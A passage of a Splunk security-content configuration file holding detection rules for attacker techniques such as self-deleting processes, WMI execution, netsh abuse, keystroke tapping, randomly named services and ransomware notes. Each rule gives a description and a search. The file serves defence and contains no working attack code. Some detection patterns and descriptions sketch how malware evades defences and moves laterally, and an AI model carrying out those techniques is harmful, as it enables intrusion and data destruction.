["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Spearphishing Attachments", "Qakbot", "IcedID", "Amadey"] action.risk = 1 action.risk.param._risk_message = A process $process_name$ that launching .lnk file in $file_path$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Process Creating LNK file in Suspicious Location - Rule action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments", "Qakbot", "IcedID", "Amadey"], "cis20": ["CIS 13"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for a process launching an `*.lnk` file under `C:\User*` or `*\Local\Temp\*`. This is common behavior used by various spear phishing tools. action.notable.param.rule_title = Process Creating LNK file in Suspicious Location action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_name="*.lnk" AND (Filesystem.file_path="C:\\User\\*" OR Filesystem.file_path="*\\Temp\\*") by _time span=1h Filesystem.process_guid Filesystem.file_name Filesystem.file_path Filesystem.file_hash Filesystem.user | `drop_dm_object_name(Filesystem)` | rename process_guid as lnk_guid | join lnk_guid, _time [| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=* by _time span=1h Processes.parent_process_guid Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process | `drop_dm_object_name(Processes)` | rename parent_process_guid as lnk_guid | fields _time lnk_guid process_id dest process_name process_path process] | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | table firstTime, lastTime, lnk_guid, process_id, user, dest, file_name, file_path, process_name, process, process_path, file_hash | `process_creating_lnk_file_in_suspicious_location_filter` [ESCU - Process Deleting Its Process File Path - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection is to identify a suspicious process that tries to delete the process file path related to its process. This technique is known to be defense evasion once a certain condition of malware is satisfied or not. Clop ransomware use this technique where it will try to delete its process file path using a .bat command if the keyboard layout is not the layout it tries to infect. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This detection is to identify a suspicious process that tries to delete the process file path related to its process. This technique is known to be defense evasion once a certain condition of malware is satisfied or not. Clop ransomware use this technique where it will try to delete its process file path using a .bat command if the keyboard layout is not the layout it tries to infect. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Process Deleting Its Process File Path - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Clop Ransomware", "Data Destruction", "WhisperGate", "Remcos"] action.risk = 1 action.risk.param._risk_message = A process $Image$ tries to delete its process path in commandline $CommandLine$ as part of defense evasion in host $dest$ by user $user$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 60}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 60}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Process Deleting Its Process File Path - Rule action.correlationsearch.annotations = {"analytic_story": ["Clop Ransomware", "Data Destruction", "WhisperGate", "Remcos"], "cis20": ["CIS 10"], "confidence": 100, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This detection is to identify a suspicious process that tries to delete the process file path related to its process. This technique is known to be defense evasion once a certain condition of malware is satisfied or not. Clop ransomware use this technique where it will try to delete its process file path using a .bat command if the keyboard layout is not the layout it tries to infect. action.notable.param.rule_title = Process Deleting Its Process File Path action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=1 CommandLine = "* /c *" CommandLine = "* del*" Image = "*\\cmd.exe" | eval result = if(like(process,"%".parent_process."%"), "Found", "Not Found") | stats min(_time) as firstTime max(_time) as lastTime count by dest user ParentImage ParentCommandLine Image CommandLine EventCode ProcessID result | where result = "Found" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `process_deleting_its_process_file_path_filter` [ESCU - Process Execution via WMI - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies `WmiPrvSE.exe` spawning a process. This typically occurs when a process is instantiated from a local or remote process using `wmic.exe`. During triage, review parallel processes for suspicious behavior or commands executed. Review the process and command-line spawning from `wmiprvse.exe`. Contain and remediate the endpoint as necessary. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies `WmiPrvSE.exe` spawning a process. This typically occurs when a process is instantiated from a local or remote process using `wmic.exe`. During triage, review parallel processes for suspicious behavior or commands executed. Review the process and command-line spawning from `wmiprvse.exe`. Contain and remediate the endpoint as necessary. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Although unlikely, administrators may use wmi to execute commands for legitimate purposes. action.escu.creation_date = 2020-03-16 action.escu.modification_date = 2020-03-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Process Execution via WMI - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Suspicious WMI Use"] action.risk = 1 action.risk.param._risk_message = A remote instance execution of wmic.exe that will spawn $parent_process_name$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Process Execution via WMI - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious WMI Use"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies `WmiPrvSE.exe` spawning a process. This typically occurs when a process is instantiated from a local or remote process using `wmic.exe`. During triage, review parallel processes for suspicious behavior or commands executed. Review the process and command-line spawning from `wmiprvse.exe`. Contain and remediate the endpoint as necessary. action.notable.param.rule_title = Process Execution via WMI action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=WmiPrvSE.exe by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `process_execution_via_wmi_filter` [ESCU - Process Kill Base On File Path - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the use of `wmic.exe` using `delete` to remove a executable path. This is typically ran via a batch file during beginning stages of an adversary setting up for mining on an endpoint. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of `wmic.exe` using `delete` to remove a executable path. This is typically ran via a batch file during beginning stages of an adversary setting up for mining on an endpoint. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Unknown. action.escu.creation_date = 2021-05-04 action.escu.modification_date = 2021-05-04 action.escu.confidence = high action.escu.full_search_name = ESCU - Process Kill Base On File Path - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["XMRig"] action.risk = 1 action.risk.param._risk_message = A process $process_name$ attempt to kill process by its file path using commandline $process$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Process Kill Base On File Path - Rule action.correlationsearch.annotations = {"analytic_story": ["XMRig"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the use of `wmic.exe` using `delete` to remove a executable path. This is typically ran via a batch file during beginning stages of an adversary setting up for mining on an endpoint. action.notable.param.rule_title = Process Kill Base On File Path action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.process_id) as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_wmic` AND Processes.process="*process*" AND Processes.process="*executablepath*" AND Processes.process="*delete*" by Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `process_kill_base_on_file_path_filter` [ESCU - Process Writing DynamicWrapperX - Rule] action.escu = 0 action.escu.enabled = 1 description = DynamicWrapperX is an ActiveX component that can be used in a script to call Windows API functions, but it requires the dynwrapx.dll to be installed and registered. With that, a binary writing dynwrapx.dll to disk and registering it into the registry is highly suspect. Why is it needed? In most malicious instances, it will be written to disk at a non-standard location. During triage, review parallel processes and pivot on the process_guid. Review the registry for any suspicious modifications meant to load dynwrapx.dll. Identify any suspicious module loads of dynwrapx.dll. This will identify the process that will invoke vbs/wscript/cscript. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1559.001"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = DynamicWrapperX is an ActiveX component that can be used in a script to call Windows API functions, but it requires the dynwrapx.dll to be installed and registered. With that, a binary writing dynwrapx.dll to disk and registering it into the registry is highly suspect. Why is it needed? In most malicious instances, it will be written to disk at a non-standard location. During triage, review parallel processes and pivot on the process_guid. Review the registry for any suspicious modifications meant to load dynwrapx.dll. Identify any suspicious module loads of dynwrapx.dll. This will identify the process that will invoke vbs/wscript/cscript. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on process that include the name of the process responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Processes` and `Filesystem` node. In addition, confirm the latest CIM App 4.20 or higher is installed and the latest TA for the endpoint product. action.escu.known_false_positives = False positives should be limited, however it is possible to filter by Processes.process_name and specific processes (ex. wscript.exe). Filter as needed. This may need modification based on EDR telemetry and how it brings in registry data. For example, removal of (Default). action.escu.creation_date = 2021-10-05 action.escu.modification_date = 2021-10-05 action.escu.confidence = high action.escu.full_search_name = ESCU - Process Writing DynamicWrapperX - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Remcos"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Process Writing DynamicWrapperX - Rule action.correlationsearch.annotations = {"analytic_story": ["Remcos"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1559.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes by _time Processes.process_id Processes.process_name Processes.dest Processes.process_guid Processes.user | `drop_dm_object_name(Processes)` | join process_guid [| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Filesystem where Filesystem.file_name="dynwrapx.dll" by _time Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.file_path Filesystem.process_guid Filesystem.user | `drop_dm_object_name(Filesystem)` | fields _time process_guid file_path file_name file_create_time user dest process_name] | stats count min(_time) as firstTime max(_time) as lastTime by dest process_name process_guid file_name file_path file_create_time user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `process_writing_dynamicwrapperx_filter` [ESCU - Processes launching netsh - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for processes launching netsh.exe. Netsh is a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a computer that is currently running. Netsh can be used as a persistence proxy technique to execute a helper DLL when netsh.exe is executed. In this search, we are looking for processes spawned by netsh.exe and executing commands via the command line. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.004", "T1562"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for processes launching netsh.exe. Netsh is a command-line scripting utility that allows you to, either locally or remotely, display or modify the network configuration of a computer that is currently running. Netsh can be used as a persistence proxy technique to execute a helper DLL when netsh.exe is executed. In this search, we are looking for processes spawned by netsh.exe and executing commands via the command line. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Some VPN applications are known to launch netsh.exe. Outside of these instances, it is unusual for an executable to launch netsh.exe and run commands. action.escu.creation_date = 2021-09-16 action.escu.modification_date = 2021-09-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Processes launching netsh - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Netsh Abuse", "Disabling Security Tools", "DHS Report TA18-074A", "Azorult", "Volt Typhoon", "Snake Keylogger"] action.risk = 1 action.risk.param._risk_message = A process $process_name$ has launched netsh with command-line $process$ on $dest$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 14}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 14}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Processes launching netsh - Rule action.correlationsearch.annotations = {"analytic_story": ["Netsh Abuse", "Disabling Security Tools", "DHS Report TA18-074A", "Azorult", "Volt Typhoon", "Snake Keylogger"], "cis20": ["CIS 10"], "confidence": 70, "impact": 20, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.004", "T1562"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process) AS Processes.process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_netsh` by Processes.parent_process_name Processes.parent_process Processes.original_file_name Processes.process_name Processes.user Processes.dest |`drop_dm_object_name("Processes")` |`security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` |`processes_launching_netsh_filter` [ESCU - Processes Tapping Keyboard Events - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for processes in an MacOS system that is tapping keyboard events in MacOS, and essentially monitoring all keystrokes made by a user. This is a common technique used by RATs to log keystrokes from a victim, although it can also be used by legitimate processes like Siri to react on human input action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search looks for processes in an MacOS system that is tapping keyboard events in MacOS, and essentially monitoring all keystrokes made by a user. This is a common technique used by RATs to log keystrokes from a victim, although it can also be used by legitimate processes like Siri to react on human input action.escu.how_to_implement = In order to properly run this search, Splunk needs to ingest data from your osquery deployed agents with the [osx-attacks.conf](https://github.com/facebook/osquery/blob/experimental/packs/osx-attacks.conf#L599) pack enabled. Also the [TA-OSquery](https://github.com/d1vious/TA-osquery) must be deployed across your indexers and universal forwarders in order to have the osquery data populate the Alerts data model. action.escu.known_false_positives = There might be some false positives as keyboard event taps are used by processes like Siri and Zoom video chat, for some good examples of processes to exclude please see [this](https://github.com/facebook/osquery/pull/5345#issuecomment-454639161) comment. action.escu.creation_date = 2019-01-25 action.escu.modification_date = 2019-01-25 action.escu.confidence = high action.escu.full_search_name = ESCU - Processes Tapping Keyboard Events - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["ColdRoot MacOS RAT"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Processes Tapping Keyboard Events - Rule action.correlationsearch.annotations = {"analytic_story": ["ColdRoot MacOS RAT"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for processes in an MacOS system that is tapping keyboard events in MacOS, and essentially monitoring all keystrokes made by a user. This is a common technique used by RATs to log keystrokes from a victim, although it can also be used by legitimate processes like Siri to react on human input action.notable.param.rule_title = Processes Tapping Keyboard Events action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | from datamodel Alerts.Alerts | search app=osquery:results name=pack_osx-attacks_Keyboard_Event_Taps | rename columns.cmdline as cmd, columns.name as process_name, columns.pid as process_id| dedup host,process_name | table host,process_name, cmd, process_id | `processes_tapping_keyboard_events_filter` [ESCU - Randomly Generated Scheduled Task Name - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following hunting analytic leverages Event ID 4698, `A scheduled task was created`, to identify the creation of a Scheduled Task with a suspicious, high entropy, Task Name. To achieve this, this analytic also leverages the `ut_shannon` function from the URL ToolBox Splunk application. Red teams and adversaries alike may abuse the Task Scheduler to create and start a remote Scheduled Task and obtain remote code execution. To achieve this goal, tools like Impacket or Crapmapexec, typically create a Scheduled Task with a random task name on the victim host. This hunting analytic may help defenders identify Scheduled Tasks created as part of a lateral movement attack. The entropy threshold `ut_shannon > 3` should be customized by users. The Command field can be used to determine if the task has malicious intent or not. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053", "T1053.005"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following hunting analytic leverages Event ID 4698, `A scheduled task was created`, to identify the creation of a Scheduled Task with a suspicious, high entropy, Task Name. To achieve this, this analytic also leverages the `ut_shannon` function from the URL ToolBox Splunk application. Red teams and adversaries alike may abuse the Task Scheduler to create and start a remote Scheduled Task and obtain remote code execution. To achieve this goal, tools like Impacket or Crapmapexec, typically create a Scheduled Task with a random task name on the victim host. This hunting analytic may help defenders identify Scheduled Tasks created as part of a lateral movement attack. The entropy threshold `ut_shannon > 3` should be customized by users. The Command field can be used to determine if the task has malicious intent or not. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Windows Security Event Logs with 4698 EventCode enabled. The Windows TA as well as the URL ToolBox application are also required. action.escu.known_false_positives = Legitimate applications may use random Scheduled Task names. action.escu.creation_date = 2021-11-29 action.escu.modification_date = 2021-11-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Randomly Generated Scheduled Task Name - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Lateral Movement", "CISA AA22-257A", "Scheduled Tasks"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Randomly Generated Scheduled Task Name - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement", "CISA AA22-257A", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 50, "impact": 90, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053", "T1053.005"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4698 | xmlkv Message | lookup ut_shannon_lookup word as Task_Name | where ut_shannon > 3 | table _time, dest, Task_Name, ut_shannon, Command, Author, Enabled, Hidden | `randomly_generated_scheduled_task_name_filter` [ESCU - Randomly Generated Windows Service Name - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following hunting analytic leverages Event ID 7045, `A new service was installed in the system`, to identify the installation of a Windows Service with a suspicious, high entropy, Service Name. To achieve this, this analytic also leverages the `ut_shannon` function from the URL ToolBox Splunk application. Red teams and adversaries alike may abuse the Service Control Manager to create and start a remote Windows Service and obtain remote code execution. To achieve this goal, some tools like Metasploit, Cobalt Strike and Impacket, typically create a Windows Service with a random service name on the victim host. This hunting analytic may help defenders identify Windows Services installed as part of a lateral movement attack. The entropy threshold `ut_shannon > 3` should be customized by users. The Service_File_Name field can be used to determine if the Windows Service has malicious intent or not. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543", "T1543.003"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following hunting analytic leverages Event ID 7045, `A new service was installed in the system`, to identify the installation of a Windows Service with a suspicious, high entropy, Service Name. To achieve this, this analytic also leverages the `ut_shannon` function from the URL ToolBox Splunk application. Red teams and adversaries alike may abuse the Service Control Manager to create and start a remote Windows Service and obtain remote code execution. To achieve this goal, some tools like Metasploit, Cobalt Strike and Impacket, typically create a Windows Service with a random service name on the victim host. This hunting analytic may help defenders identify Windows Services installed as part of a lateral movement attack. The entropy threshold `ut_shannon > 3` should be customized by users. The Service_File_Name field can be used to determine if the Windows Service has malicious intent or not. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the Service name, Service File Name Service Start type, and Service Type from your endpoints. The Windows TA as well as the URL ToolBox application are also required. action.escu.known_false_positives = Legitimate applications may use random Windows Service names. action.escu.creation_date = 2021-11-29 action.escu.modification_date = 2021-11-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Randomly Generated Windows Service Name - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Active Directory Lateral Movement"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Randomly Generated Windows Service Name - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 50, "impact": 90, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543", "T1543.003"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_system` EventCode=7045 | lookup ut_shannon_lookup word as Service_Name | where ut_shannon > 3 | table EventCode ComputerName Service_Name ut_shannon Service_Start_Type Service_Type Service_File_Name | `randomly_generated_windows_service_name_filter` [ESCU - Ransomware Notes bulk creation - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytics identifies a big number of instance of ransomware notes (filetype e.g .txt, .html, .hta) file creation to the infected machine. This behavior is a good sensor if the ransomware note filename is quite new for security industry or the ransomware note filename is not in your ransomware lookup table list for monitoring. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1486"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytics identifies a big number of instance of ransomware notes (filetype e.g .txt, .html, .hta) file creation to the infected machine. This behavior is a good sensor if the ransomware note filename is quite new for security industry or the ransomware note filename is not in your ransomware lookup table list for monitoring. action.escu.how_to_implement = You must be ingesting data that records the filesystem activity from your hosts to populate the Endpoint file-system data model node. If you are using Sysmon, you will need a Splunk Universal Forwarder on each endpoint from which you want to collect data. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-03-12 action.escu.modification_date = 2021-03-12 action.escu.confidence = high action.escu.full_search_name = ESCU - Ransomware Notes bulk creation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Clop Ransomware", "DarkSide Ransomware", "BlackMatter Ransomware", "Chaos Ransomware", "LockBit Ransomware", "Rhysida Ransomware"] action.risk = 1 action.risk.param._risk_message = A high frequency file creation of $file_name$ in different file path in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 81}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Ransomware Notes bulk creation - Rule action.correlationsearch.annotations = {"analytic_story": ["Clop Ransomware", "DarkSide 